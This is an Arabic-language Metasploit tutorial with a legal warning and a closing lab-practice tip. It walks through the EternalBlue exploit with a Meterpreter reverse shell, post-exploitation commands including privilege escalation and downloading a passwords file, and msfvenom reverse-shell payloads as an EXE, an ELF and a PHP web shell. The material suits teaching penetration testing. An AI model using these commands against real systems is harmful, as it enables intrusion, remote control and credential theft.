⚠️ تحذير قانوني:
استخدم Metasploit فقط على أنظمة تملكها أو لديك إذن خطي باختبارها. الاستخدام غير المصرح به جريمة جنائية في معظم الدول.

💥 ما هو Metasploit Framework؟

Metasploit Framework هو أشهر إطار عمل لاختبار الاختراق. يحتوي على آلاف الـ Exploits والـ Payloads الجاهزة للاستخدام. تم تطويره بلغة Ruby ويعمل على جميع أنظمة التشغيل الرئيسية.

🚀 تشغيل Metasploit

root@kali:~$
# تشغيل قاعدة البيانات أولاً
sudo service postgresql start
[ ok ] Starting postgresql (via systemctl)...

# تشغيل Metasploit
msfconsole
       =[ metasploit v6.4.0 ]=
+ -- --=[ 2400+ exploits | 1200+ auxiliary | 420+ post ]
+ -- --=[ 980+ payloads | 60+ encoders | 10+ nops ]
msf6 >

🔧 أوامر Metasploit الأساسية

msf6 >
# البحث عن Exploit
msf6 > search type:exploit platform:windows ms17-010

# اختيار الـ Exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# عرض الخيارات المطلوبة
msf6 exploit(ms17_010_eternalblue) > show options

# تعيين الهدف
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.50

# اختيار الـ Payload
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# تعيين عنوان IP الخاص بنا
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.1.100

# تشغيل الـ Exploit
msf6 exploit(ms17_010_eternalblue) > run

🐚 Meterpreter - الـ Shell المتقدم

بعد الاختراق الناجح، تحصل على Meterpreter Shell - وهو Shell متقدم يوفر إمكانيات قوية:

meterpreter >
# معلومات النظام
meterpreter > sysinfo
Computer : DESKTOP-TARGET
OS       : Windows 10 (Build 19044)
Architecture : x64

# رفع صلاحيات
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation)

# تصوير الشاشة
meterpreter > screenshot

# تنزيل ملف
meterpreter > download C:/Users/Admin/passwords.txt

# تشغيل Shell عادي
meterpreter > shell

🎯 msfvenom - إنشاء Payloads

root@kali:~$
# Payload لـ Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f exe -o payload.exe

# Payload لـ Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f elf -o payload.elf

# Web Shell PHP
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f raw -o shell.php

📋 أوامر msfconsole المهمة

  • search — البحث عن Exploits والـ Modules
  • info — معلومات تفصيلية عن الـ Module
  • show payloads — عرض الـ Payloads المتوافقة
  • set / setg — تعيين المتغيرات (setg عالمي)
  • sessions -l — عرض جميع الجلسات المفتوحة
  • sessions -i 1 — الدخول لجلسة معينة
  • background — إخفاء الجلسة للخلفية
  • db_nmap -sV target — نسخ Nmap مع حفظ النتائج
💡 نصيحة للمختبرين:
دائماً اختبر في بيئة معزولة (Lab) قبل التطبيق. استخدم Metasploitable 2/3 كهدف تدريبي آمن.